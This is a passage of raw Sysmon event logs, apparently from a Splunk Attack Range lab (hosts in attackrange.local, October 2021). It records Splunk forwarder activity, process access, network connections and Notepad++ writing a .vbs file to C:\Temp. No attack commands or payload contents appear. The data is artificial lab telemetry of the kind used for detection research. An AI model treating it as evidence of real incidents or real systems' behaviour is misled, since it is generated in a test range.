07:59:04.270{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106183Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.268{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106182Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.268{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B447-615A-1402-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106181Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.268{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106180Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.267{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106179Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.992{58E9C193-B447-615A-1402-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106199Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.896{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0663C191AEF4D9AF2A5F6E9EFBC1274E,SHA256=26F7A086E72461CAAB3F5C084CA884103CF79BC2E535798494809030F3065520,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082933Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:02.687{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50128-false10.0.1.12-8000- 23542300x800000000000000082932Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:05.024{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9990D195855F9D5ED8D47E7924B5D5EE,SHA256=09E1FF5CCED6A52EFCBAD7DA6A39754C8FC9266D121E4DBAC8C05D47D94057C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106198Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.860{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=34517CE4CFB81FDD3E92A4A85BD26AA0,SHA256=2BC290A5DC22E90ABF601EE0A977EB6B6CDE3B1C36C575259A8F90A34485EF68,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106197Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.663{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B449-615A-1502-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106196Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.661{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106195Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.661{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106194Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.661{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106193Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.660{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106192Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.660{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B449-615A-1502-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106191Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.659{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B449-615A-1502-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106190Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.517{58E9C193-B449-615A-1502-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106189Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:05.010{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAC1E50BC94824F524E3F260AF5C5EC9,SHA256=8A9D85AE1EAF1E4F29B267A402C2FE9639A65EADDADECC03759070A1CE590FEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106201Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:06.900{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA8264C2F7343E915A3796707F71F908,SHA256=7ECD62DE7F04D3EC21DBF9A593A8DF92CF0C7DF70F813006C30A5569200E0249,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082934Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:06.039{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6495397A1FEAAF31343A0F5CF1B40C0,SHA256=CA55DA5A27453991E2B33DBF56821622A426A003611BB62AAE5CB0E2D02021D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106200Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:06.524{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0631BBD11EA3B798DF2EBBBCAC6AD10B,SHA256=8900EA0B4517E6B13AE8C69389F4D8E9D956525546D8403366C6EAF544B80D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106202Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:07.905{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B2F7244540E3DA7A4900C75EDAC88A1,SHA256=FAD1ABE09F787CA5FD643CDCC3E11DBCF543050C9DB13832E50001A855177907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082935Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:07.039{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C91085BE23FA45795C242632AD70C2,SHA256=30C3C2ECED3D036375656392382DC517D751DB3A9EDCF9AA6CDDB8E2BED3029D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106204Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:08.909{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=770482097CBF0B511BBA11E11C72C46C,SHA256=BC6FBB59BCCF518B8107C4DE9D1ADC410BCA2FBE9D3B91866EB4AE699A5DD470,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082937Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:08.872{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-031MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082936Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:08.039{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453F8053BDA7A24773228736907AF282,SHA256=48FAEB53BB0CD4981BF19D6EF03B4D24FF07A961129849F56DEDBAB16A1AFAC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106203Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:06.285{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51834-false10.0.1.12-8000- 23542300x8000000000000000106205Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:09.911{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAE28D4893A5FB4A345D60127029C3F3,SHA256=CE0CDA0A1B820D0AE729E432D38C7471FCF8FC53CCFB1E54AF51192CFFF17F12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082940Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:09.878{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-032MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082939Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:07.703{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50129-false10.0.1.12-8000- 23542300x800000000000000082938Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:09.049{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5484606CE2DD7733F2485494528BB4,SHA256=2C53FCDF5B70427363CB2FB39C9082BDA111C5DFC01A00CE8F7FF6CB6514361E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106206Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:10.915{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=995E2CF4F9DBA7073C93C7E27BCCB749,SHA256=2334340A0711920E713C562634D6EF9513A7991BD1048B97B9CB7161ED60D260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082941Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:10.062{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECB5A173FB651592C48D9E7CE2C457CE,SHA256=2792A1DEFC72EB5DEA1493284962AF7332A30B27BB2BB0A0BBF3A690613C2A46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106210Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:11.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB659FA672E3957DD99BF50553FC7897,SHA256=A00D12B5D68844AD7CB20656B7DCA484D8BABA13938C1261ABDA79BA056D76DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082942Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:11.064{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0E230A84C7B2A4919AECFC3AD1382D0,SHA256=0C1CB8D8403985E15B5D875848F576B9AC0B3DAAA47EFE0347EE9DCA92520A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106209Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:11.126{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\_______ _____ ___ ______ ______.vbs@2021-10-04_075905MD5=E66ECF17E281A02C6353578A5B10876B,SHA256=2B7A3DA9E2AA45067ADEDE22126BF2E10E6AFD9F52D4D6E5BA35C06C9E6F263E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106208Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:11.118{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbs2021-10-04 07:34:26.000 23542300x8000000000000000106207Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:11.117{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbsMD5=F11AF900F15215D81245B000809E7BE8,SHA256=79152EFEFD6F3C958CDB4B2FAA6FF2A1F18FAB55EBE28B9873154DEC9BBA37EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106213Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:12.933{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 